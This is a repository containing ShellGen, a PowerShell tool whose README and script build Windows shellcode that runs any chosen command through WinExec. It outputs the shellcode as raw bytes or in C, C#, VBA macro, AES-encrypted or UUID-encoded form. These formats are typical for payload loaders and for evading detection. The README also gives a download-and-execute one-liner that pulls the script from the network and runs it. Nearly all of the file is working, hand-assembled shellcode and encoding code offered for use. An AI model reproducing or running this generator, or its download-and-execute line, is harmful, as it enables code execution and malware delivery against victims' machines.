├── README.md └── ShellGen.ps1 /README.md: -------------------------------------------------------------------------------- 1 | # ShellGen 2 | 3 | PowerShell script to generate ShellCode in various formats 4 | 5 | ``` 6 | iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/ShellGen/main/ShellGen.ps1') 7 | ``` 8 | ``` 9 | ShellGen -x64 -Command "cmd /k ipconfig" -OutputFormat "Encrypted" 10 | ``` 11 | ``` 12 | ShellGen -x64 -Command "cmd /k ipconfig" -OutputFormat "Raw" -OutputFilePath C:\Users\Senna\Desktop\whoami.bin 13 | ``` 14 | 15 | ### Output Formats 16 | 17 | ``` 18 | Raw, ps1, Hex, C, vba, csharp, Encrypted, UUID 19 | ``` 20 | 21 | ### Architecture 22 | 23 | ``` 24 | x64, x86 25 | ``` 26 | 27 | ### Feed a raw shellcode file 28 | 29 | ``` 30 | Shellgen -RawFile "C:\Users\User\Desktop\file.bin" -OutputFormat vba 31 | ``` 32 | -------------------------------------------------------------------------------- /ShellGen.ps1: -------------------------------------------------------------------------------- 1 | function ShellGen { 2 | 3 | <# 4 | .SYNOPSIS 5 | ShellGen.ps1 | Author: Rob LP (@L3o4j) 6 | https://github.com/Leo4j/ShellGen 7 | 8 | .DESCRIPTION 9 | Generate ShellCode in various formats 10 | #> 11 | 12 | param ( 13 | [string]$Command, 14 | [string]$RawFile, 15 | [switch]$x64, 16 | [switch]$x86, 17 | [string]$OutputFilePath, 18 | [string]$OutputFormat = "Raw" 19 | ) 20 | 21 | if($RawFile){ 22 | if(Test-Path $RawFile){ 23 | $shellcode = [System.IO.File]::ReadAllBytes($RawFile) 24 | } else { 25 | Write-Output "" 26 | Write-Output "[-] Please provide a valid path to a file containing raw shellcode" 27 | Write-Output "" 28 | break 29 | } 30 | } 31 | else{ 32 | $ShCommand = $Command 33 | 34 | if($x64){ 35 | # WinExec x64 PI Null Free 36 | [Byte[]] $shellcode = 0x48,0x31,0xd2 # xor rdx,rdx 37 | $shellcode += 0x65,0x48,0x8b,0x42,0x60 # mov rax,qword ptr gs:[rdx+0x60] 38 | $shellcode += 0x48,0x8b,0x70,0x18 # mov rsi,qword ptr [rax+0x18] 39 | $shellcode += 0x48,0x8b,0x76,0x20 # mov rsi,qword ptr [rax+0x20] 40 | $shellcode += 0x4c,0x8b,0x0e # mov r9,QWORD PTR [rsi] 41 | $shellcode += 0x4d,0x8b,0x09 # mov r9,QWORD PTR [r9] 42 | $shellcode += 0x4d,0x8b,0x49,0x20 # mov r9,QWORD PTR [r9+0x20] 43 | $shellcode += 0xeb,0x63 # jmp 0x7f 44 | $shellcode += 0x41,0x8b,0x49,0x3c # mov ecx,DWORD PTR [r9+0x3c] 45 | $shellcode += 0x4d,0x31,0xff # xor r15,r15 46 | $shellcode += 0x41,0xb7,0x88 # mov r15b,0x88 47 | $shellcode += 0x4d,0x01,0xcf # add r15,r9 48 | $shellcode += 0x49,0x01,0xcf # add r15,rcx 49 | $shellcode += 0x45,0x8b,0x3f # mov r15d,dword ptr [r15] 50 | $shellcode += 0x4d,0x01,0xcf # add r15,r9 51 | $shellcode += 0x41,0x8b,0x4f,0x18 # mov ecx,dword ptr [r15+0x18] 52 | $shellcode += 0x45,0x8b,0x77,0x20 # mov r14d,dword ptr [r15+0x20] 53 | $shellcode += 0x4d,0x01,0xce # add r14,r9 54 | $shellcode += 0xe3,0x3f # jrcxz 0x7e 55 | $shellcode += 0xff,0xc9 # dec ecx 56 | $shellcode += 0x48,0x31,0xf6 # xor rsi,rsi 57 | $shellcode += 0x41,0x8b,0x34,0x8e # mov esi,DWORD PTR [r14+rcx*4] 58 | $shellcode += 0x4c,0x01,0xce # add rsi,r9 59 | $shellcode += 0x48,0x31,0xc0 # xor rax,rax 60 | $shellcode += 0x48,0x31,0xd2 # xor rdx,rdx 61 | $shellcode += 0xfc # cld 62 | $shellcode += 0xac # lods al,byte ptr ds:[rsi] 63 | $shellcode += 0x84,0xc0 # test al,al 64 | $shellcode += 0x74,0x07 # je 0x5e 65 | $shellcode += 0xc1,0xca,0x0d # ror edx,0xd 66 | $shellcode += 0x01,0xc2 # add edx,eax 67 | $shellcode += 0xeb,0xf4 # jmp 0x52 68 | $shellcode += 0x44,0x39,0xc2 # cmp edx,r8d 69 | $shellcode += 0x75,0xda # jne 0x3d 70 | $shellcode += 0x45,0x8b,0x57,0x24 # mov r10d,DWORD PTR [r15+0x24] 71 | $shellcode += 0x4d,0x01,0xca # add r10,r9 72 | $shellcode += 0x41,0x0f,0xb7,0x0c,0x4a # movzx ecx,WORD PTR [r10+rcx*2] 73 | $shellcode += 0x45,0x8b,0x5f,0x1c # mov r11d,DWORD PTR [r15+0x1c] 74 | $shellcode += 0x4d,0x01,0xcb # add r11,r9 75 | $shellcode += 0x41,0x8b,0x04,0x8b # mov eax,DWORD PTR [r11+rcx*4] 76 | $shellcode += 0x4c,0x01,0xc8 # add rax,r9 77 | $shellcode += 0xc3 # ret 78 | $shellcode += 0xc3 # ret 79 | $shellcode += 0x41,0xb8,0x83,0xb9,0xb5,0x78 # mov r8d, 0x78b5b983 TerminateProcess Hash 80 | $shellcode += 0xe8,0x92,0xff,0xff,0xff # call 0x1c 81 | $shellcode += 0x48,0x89,0xc3 # mov rbx, rax 82 | $shellcode += 0x41,0xb8,0x98,0xfe,0x8a,0x0e # mov r8d,0xe8afe98 WinExec Hash 83 | $shellcode += 0xe8,0x84,0xff,0xff,0xff # call 0x1c 84 | $shellcode += 0x48,0x31,0xc9 # xor rcx,rcx 85 | 86 | $shellcode += x64Command $ShCommand 87 | 88 | $shellcode += 0x48,0x8d,0x0c,0x24 # lea rcx,[rsp] 89 | $shellcode += 0x48,0x31,0xd2 # xor rdx,rdx 90 | $shellcode += 0x48,0xff,0xc2 # inc rdx 91 | $shellcode += 0x48,0x83,0xec,0x28 # sub rsp, 0x28 92 | $shellcode += 0xff,0xd0 # call rax 93 | 94 | $shellcode += 0x48,0x31,0xc9 # xor rcx,rcx 95 | $shellcode += 0x48,0xff,0xc1 # inc rcx 96 | $shellcode += 0x48,0x31,0xc0 # xor rax,rax 97 | $shellcode += 0x04,0x53 # add al, 0x53 exit_thread syscall val 98 | $shellcode += 0x0f,0x05 # syscall 99 | } 100 | 101 | if($x86){ 102 | # WinExec x86 PI Null Free 103 | [Byte[]] $shellcode = 0x89,0xe5 # mov ebp,esp 104 | $shellcode += 0x81,0xc4,0xf0,0xf9,0xff,0xff # add esp,0xfffff9f0 105 | $shellcode += 0x31,0xc9 # xor ecx,ecx 106 | $shellcode += 0x64,0x8b,0x71,0x30 # mov esi,DWORD PTR fs:[ecx+0x30] 107 | $shellcode += 0x8b,0x76,0x0c # mov esi,DWORD PTR [esi+0xc] 108 | $shellcode += 0x8b,0x76,0x1c # mov esi,DWORD PTR [esi+0x1c] 109 | $shellcode += 0x8b,0x5e,0x08 # mov ebx,DWORD PTR [esi+0x8] 110 | $shellcode += 0x8b,0x7e,0x20 # mov edi,DWORD PTR [esi+0x20] 111 | $shellcode += 0x8b,0x36 # mov esi,DWORD PTR [esi] 112 | $shellcode += 0x66,0x39,0x4f,0x18 # cmp WORD PTR [edi+0x18],cx 113 | $shellcode += 0x75,0xf2 # jne 0x14 114 | $shellcode += 0xeb,0x06 # jmp 0x2a 115 | $shellcode += 0x5e # pop esi 116 | $shellcode += 0x89,0x75,0x04 # mov DWORD PTR [ebp+0x4],esi 117 | $shellcode += 0xeb,0x54 # jmp 0x7e 118 | $shellcode += 0xe8,0xf5,0xff,0xff,0xff # call 0x24 119 | $shellcode += 0x60 # pusha 120 | $shellcode += 0x8b,0x43,0x3c # mov eax,DWORD PTR [ebx+0x3c] 121 | $shellcode += 0x8b,0x7c,0x03,0x78 # mov edi,DWORD PTR [ebx+eax*1+0x78] 122 | $shellcode += 0x01,0xdf # add edi,ebx 123 | $shellcode += 0x8b,0x4f,0x18 # mov ecx,DWORD PTR [edi+0x18] 124 | $shellcode += 0x8b,0x47,0x20 # mov eax,DWORD PTR [edi+0x20] 125 | $shellcode += 0x01,0xd8 # add eax,ebx 126 | $shellcode += 0x89,0x45,0xfc # mov DWORD PTR [ebp-0x4],eax 127 | $shellcode += 0xe3,0x36 # jecxz 0x7c 128 | $shellcode += 0x49 # dec ecx 129 | $shellcode += 0x8b,0x45,0xfc # mov eax,DWORD PTR [ebp-0x4] 130 | $shellcode += 0x8b,0x34,0x88 # mov esi,DWORD PTR [eax+ecx*4] 131 | $shellcode += 0x01,0xde # add esi,ebx 132 | $shellcode += 0x31,0xc0 # xor eax,eax 133 | $shellcode += 0x99 # cdq 134 | $shellcode += 0xfc # cld 135 | $shellcode += 0xac # lods al,BYTE PTR ds:[esi] 136 | $shellcode += 0x84,0xc0 # test al,al 137 | $shellcode += 0x74,0x07 # je 0x5f 138 | $shellcode += 0xc1,0xca,0x0d # ror edx,0xd 139 | $shellcode += 0x01,0xc2 # add edx,eax 140 | $shellcode += 0xeb,0xf4 # jmp 0x53 141 | $shellcode += 0x3b,0x54,0x24,0x24 # cmp edx,DWORD PTR [esp+0x24] 142 | $shellcode += 0x75,0xdf # jne 0x44 143 | $shellcode += 0x8b,0x57,0x24 # mov edx,DWORD PTR [edi+0x24] 144 | $shellcode += 0x01,0xda # add edx,ebx 145 | $shellcode += 0x66,0x8b,0x0c,0x4a # mov cx,WORD PTR [edx+ecx*2] 146 | $shellcode += 0x8b,0x57,0x1c # mov edx,DWORD PTR [edi+0x1c] 147 | $shellcode += 0x01,0xda # add edx,ebx 148 | $shellcode += 0x8b,0x04,0x8a # mov eax,DWORD PTR [edx+ecx*4] 149 | $shellcode += 0x01,0xd8 # add eax,ebx 150 | $shellcode += 0x89,0x44,0x24,0x1c # mov DWORD PTR [esp+0x1c],eax 151 | $shellcode += 0x61 # popa 152 | $shellcode += 0xc3 # ret 153 | $shellcode += 0x68,0x83,0xb9,0xb5,0x78 # push 0x78b5b983 154 | $shellcode += 0xff,0x55,0x04 # call DWORD PTR [ebp+0x4] 155 | $shellcode += 0x89,0x45,0x10 # mov DWORD PTR [ebp+0x10],eax 156 | $shellcode += 0x68,0x98,0xfe,0x8a,0x0e # push 0xe8afe98 157 | $shellcode += 0xff,0x55,0x04 # call DWORD PTR [ebp+0x4] 158 | $shellcode += 0x89,0x45,0x14 # mov DWORD PTR [ebp+0x14],eax 159 | $shellcode += 0x31,0xc0 # xor eax,eax 160 | $shellcode += 0x50 # push eax 161 | 162 | $shellcode += x86Command $ShCommand 163 | 164 | $shellcode += 0x89,0xe3 # mov ebx,esp 165 | $shellcode += 0x50 # push eax 166 | $shellcode += 0x53 # push ebx 167 | $shellcode += 0xff,0x55,0x14 # call DWORD PTR [ebp+0x14] 168 | $shellcode += 0x31,0xc9 # xor ecx,ecx 169 | $shellcode += 0x51 # push ecx 170 | $shellcode += 0x6a,0xff # push 0xffffffff 171 | $shellcode += 0xff,0x55,0x10 # call DWORD PTR [ebp+0x10] 172 | } 173 | } 174 | 175 | $payloadSize = $shellcode.Length 176 | 177 | switch ($OutputFormat) { 178 | "Encrypted" { 179 | $keyString = -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_}) 180 | $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($keyString) 181 | $encryptedData = AESEncrypt -plainText $shellcode -Key $keyBytes 182 | $formattedOutput = Format-ByteArray -byteArray $encryptedData 183 | $formattedKey = Format-ByteArray -byteArray $keyBytes 184 | Write-Output "AESkey[] = {$formattedKey}" 185 | Write-Output "payload[] = {$formattedOutput}" 186 | Write-Output "" 187 | } 188 | "Raw" { 189 | if (-not $OutputFilePath) { 190 | $OutputFilePath = ".\payload.raw" 191 | } 192 | Set-Content -Path $OutputFilePath -Value $shellcode -Encoding Byte 193 | $finalSize = (Get-Item $OutputFilePath).length 194 | Write-Output "Payload size: $payloadSize bytes" 195 | Write-Output "Final size of raw file: $finalSize bytes" 196 | Write-Output "[*] Payload saved to $OutputFilePath" 197 | Write-Output "" 198 | } 199 | "ps1" { 200 | $ps1Content = "[Byte[]] `$buf = $(($shellcode | ForEach-Object { `"0x{0:X2}`" -f $_ }) -join ',')" 201 | 202 | if ($OutputFilePath) { 203 | Set-Content -Path $OutputFilePath -Value $ps1Content 204 | $finalSize = (Get-Item $OutputFilePath).length 205 | Write-Output "Payload size: $payloadSize bytes" 206 | Write-Output "Final size of ps1 file: $finalSize bytes" 207 | Write-Output "[*] Payload saved to $OutputFilePath" 208 | } 209 | else{ 210 | Write-Output "Payload size: $payloadSize bytes" 211 | Write-Output $ps1Content 212 | } 213 | Write-Output "" 214 | } 215 | "Hex" { 216 | $hexContent = "$($shellcode | foreach-object { "$($_.ToString("X2"))" })" 217 | $hexContent = $hexContent.replace(' ', '') 218 | Write-Output "Payload size: $payloadSize bytes" 219 | Write-Output "Final size of Hex string: $($hexContent.Length) characters" 220 | Write-Output $hexContent 221 | Write-Output "" 222 | } 223 | "C" { 224 | $formattedShellcode = $shellcode | ForEach-Object { '\x' + $_.ToString('X2') } 225 | $lines = @() 226 | for ($i = 0; $i -lt $formattedShellcode.Length; $i += 15) { 227 | $line = $formattedShellcode[$i..[Math]::Min($i+14, $formattedShellcode.Length-1)] -join '' 228 | $lines += "`"$line`"" 229 | } 230 | $cContent = "unsigned char buf[] =`n" + ($lines -join "`n") + ";" 231 | if ($OutputFilePath) { 232 | Set-Content -Path $OutputFilePath -Value $cContent 233 | $finalSize = (Get-Item $OutputFilePath).length 234 | Write-Output "Payload size: $payloadSize bytes" 235 | Write-Output "Final size of C file: $finalSize bytes" 236 | } 237 | else{ 238 | Write-Output "Payload size: $payloadSize bytes" 239 | } 240 | Write-Output $cContent 241 | Write-Output "" 242 | } 243 | "vba" { 244 | $chunkSize = 100 245 | $shellcodeChunks = @() 246 | 247 | # Initialize the first chunk to avoid repetition 248 | $vbaContent = "buf = Array(" + ($shellcode[0..([Math]::Min($chunkSize - 1, $shellcode.Length - 1))] -join ',') + ")" + "`n" 249 | 250 | # Loop through the rest of the shellcode starting from the second chunk 251 | for ($i = $chunkSize; $i -lt $shellcode.Length; $i += $chunkSize) { 252 | $chunk = $shellcode[$i..([Math]::Min($i + $chunkSize - 1, $shellcode.Length - 1))] 253 | $shellcodeChunks += "buf = Concatenate(buf, Array(" + ($chunk -join ',') + "))" 254 | } 255 | 256 | # Combine all chunks into VBA content 257 | $vbaContent += ($shellcodeChunks -join "`n") 258 | 259 | # Output or save to file 260 | if ($OutputFilePath) { 261 | Set-Content -Path $OutputFilePath -Value $vbaContent 262 | $finalSize = (Get-Item $OutputFilePath).length 263 | Write-Output "" 264 | Write-Output "Payload size: $payloadSize bytes" 265 | Write-Output "" 266 | Write-Output "Final size of vbapplication file: $finalSize bytes" 267 | Write-Output "[*] Payload saved to $OutputFilePath" 268 | } else { 269 | Write-Output "" 270 | Write-Output "Payload size: $payloadSize bytes" 271 | Write-Output "" 272 | Write-Output $vbaContent 273 | } 274 | Write-Output "" 275 | Write-Output "!! Add the following function to your VBA script !!" 276 | Write-Output "" 277 | Write-Output @' 278 | Function Concatenate(arr1 As Variant, arr2 As Variant) As Variant 279 | Dim result() As Variant 280 | Dim i As Long, j As Long, k As Long 281 | 282 | ' Resize the result array to fit both arrays 283 | ReDim result(LBound(arr1) To UBound(arr1) + UBound(arr2) - LBound(arr2) + 1) 284 | 285 | ' Copy first array to result 286 | For i = LBound(arr1) To UBound(arr1) 287 | result(i) = arr1(i) 288 | Next i 289 | 290 | ' Copy second array to result 291 | k = i ' Start index for the second array in the result 292 | For j = LBound(arr2) To UBound(arr2) 293 | result(k) = arr2(j) 294 | k = k + 1 295 | Next j 296 | 297 | Concatenate = result 298 | End Function 299 | '@ 300 | Write-Output "" 301 | } 302 | "csharp" { 303 | $formattedShellcode = $shellcode | ForEach-Object { '0x' + $_.ToString('X2') } 304 | $lines = @() 305 | for ($i = 0; $i -lt $formattedShellcode.Length; $i += 15) { 306 | $line = $formattedShellcode[$i..[Math]::Min($i+14, $formattedShellcode.Length-1)] -join ',' 307 | $lines += $line 308 | } 309 | $csharpContent = "byte[] buf = new byte[$payloadSize] {`n" + ($lines -join ",`n") + "};" 310 | if ($OutputFilePath) { 311 | Set-Content -Path $OutputFilePath -Value $csharpContent 312 | $finalSize = (Get-Item $OutputFilePath).length 313 | Write-Output "Payload size: $payloadSize bytes" 314 | Write-Output "Final size of csharp file: $finalSize bytes" 315 | Write-Output "[*] Payload saved to $OutputFilePath" 316 | } 317 | else { 318 | Write-Output "Payload size: $payloadSize bytes" 319 | Write-Output $csharpContent 320 | } 321 | Write-Output "" 322 | } 323 | "UUID" { 324 | $UUIDContent = Convert-UUID -bin $shellcode 325 | 326 | if ($OutputFilePath) { 327 | Set-Content -Path $OutputFilePath -Value $UUIDContent 328 | $finalSize = (Get-Item $OutputFilePath).length 329 | Write-Output "Final size of csharp file: $finalSize bytes" 330 | Write-Output "[*] Payload saved to $OutputFilePath" 331 | } 332 | else { 333 | Write-Output $UUIDContent 334 | } 335 | } 336 | } 337 | } 338 | 339 | function x64Reverse ([array] $chunks) { 340 | $arr = $chunks | ForEach-Object { $_ } 341 | [array]::Reverse($arr) 342 | return $arr 343 | } 344 | 345 | function x86Reverse ([array] $chunks) { 346 | $arr = $chunks | ForEach-Object { $_ } 347 | [array]::Reverse($arr) 348 | return $arr 349 | } 350 | 351 | function x64Encode-Command { 352 | param ( 353 | [string]$command 354 | ) 355 | while ($command.Length -lt 7) { 356 | $command = $command + " " 357 | } 358 | 359 | $result = [System.Text.Encoding]::UTF8.GetBytes($command) 360 | $result = $result | ForEach-Object { -bnot ($_ -band 0xFF) -band 0xFF } 361 | if ($command.Length -lt 8) { 362 | $result += 0xff 363 | } 364 | return $result 365 | 366 | } 367 | 368 | function x86Encode-Command { 369 | param ( 370 | [string]$command 371 | ) 372 | while ($command.Length -lt 3) { 373 | $command = $command + " " 374 | } 375 | 376 | $result = [System.Text.Encoding]::UTF8.GetBytes($command) 377 | if ($command.Length -lt 4) { 378 | $result += 0x20 379 | } 380 | return $result 381 | 382 | } 383 | 384 | function x64Command ([string] $command) { 385 | $size = 8 386 | $chunks = @(for ($i = 0; $i -lt $command.Length; $i += $size) { $command.Substring($i, [Math]::Min($size, $command.Length - $i)) }) 387 | $output = @() 388 | if ($chunks.Count -gt 1) { 389 | $chunks = x64Reverse($chunks) 390 | } else { 391 | $output += 0x48,0xb9,0xdf,0xdf,0xdf,0xdf,0xdf,0xdf,0xdf,0xff,0x48,0xf7,0xd1,0x51 392 | } 393 | foreach ($chunk in $chunks) { 394 | $output += 0x48,0xb9 395 | $output += x64Encode-Command $chunk 396 | $output += 0x48,0xf7,0xd1 397 | $output += 0x51 398 | } 399 | return $output 400 | } 401 | 402 | function x86Command ([string] $command) { 403 | $size = 4 404 | $chunks = @(for ($i = 0; $i -lt $command.Length; $i += $size) { $command.Substring($i, [Math]::Min($size, $command.Length - $i)) }) 405 | $output = @() 406 | if ($chunks.Count -gt 1) { 407 | $chunks = x86Reverse($chunks) 408 | } 409 | foreach ($chunk in $chunks) { 410 | $output += 0x68 411 | $output += x86Encode-Command $chunk 412 | } 413 | return $output 414 | } 415 | 416 | function AESEncrypt { 417 | param ( 418 | [byte[]]$plainText, # The data to be encrypted 419 | [byte[]]$Key # The cleartext key 420 | ) 421 | 422 | if ($Key.Length -ne 16 -and $Key.Length -ne 24 -and $Key.Length -ne 32) { 423 | throw "Invalid key size. AES supports keys of 128, 192, or 256 bits." 424 | } 425 | 426 | $aesAlg = [System.Security.Cryptography.Aes]::Create() 427 | $aesAlg.Key = [System.Security.Cryptography.SHA256]::Create().ComputeHash($Key) # Hash the key to match Python scripts if needed 428 | $aesAlg.Mode = [System.Security.Cryptography.CipherMode]::CBC 429 | $aesAlg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 430 | $aesAlg.IV = [byte[]](0..15 | ForEach-Object { 0 }) # Fixed IV of 16 null bytes 431 | 432 | $encryptor = $aesAlg.CreateEncryptor($aesAlg.Key, $aesAlg.IV) 433 | return $encryptor.TransformFinalBlock($plainText, 0, $plainText.Length) 434 | } 435 | 436 | function Format-ByteArray { 437 | param ( 438 | [byte[]]$byteArray 439 | ) 440 | 441 | $formattedBytes = $byteArray | ForEach-Object { "0x{0:x2}" -f $_ } 442 | return ($formattedBytes -join ", ") 443 | } 444 | 445 | function Convert-UUID { 446 | param ( 447 | [Parameter(Mandatory = $true)] 448 | [byte[]]$bin 449 | ) 450 | 451 | $offset = 0 452 | $output = "" 453 | 454 | Write-Host "Payload size: $($bin.Length) bytes" 455 | 456 | while ($offset -lt $bin.Length) { 457 | $countOfBytesToConvert = $bin.Length - $offset 458 | if ($countOfBytesToConvert -lt 16) { 459 | # Add padding with 0x90 if there are less than 16 bytes 460 | $ZerosToAdd = 16 - $countOfBytesToConvert 461 | $padding = @(0x90) * $ZerosToAdd 462 | $byteArray = $bin[$offset..($bin.Length - 1)] + $padding 463 | } else { 464 | # Get the next 16 bytes 465 | $byteArray = $bin[$offset..($offset + 15)] 466 | } 467 | 468 | # Convert the byte array to little-endian order as per UUID(bytes_le=chunk) 469 | # Extract fields from the byte array 470 | $Data1 = [BitConverter]::ToInt32($byteArray, 0) # bytes 0-3 471 | $Data2 = [BitConverter]::ToInt16($byteArray, 4) # bytes 4-5 472 | $Data3 = [BitConverter]::ToInt16($byteArray, 6) # bytes 6-7 473 | $Data4 = $byteArray[8..15] # bytes 8-15 474 | 475 | # Create the GUID using the extracted fields 476 | $uuid = New-Object System.Guid ($Data1, $Data2, $Data3, $Data4) 477 | 478 | $offset += 16 479 | 480 | # Store the UUID in the output 481 | $output += "`"$uuid`",`n" 482 | } 483 | $output 484 | } 485 | --------------------------------------------------------------------------------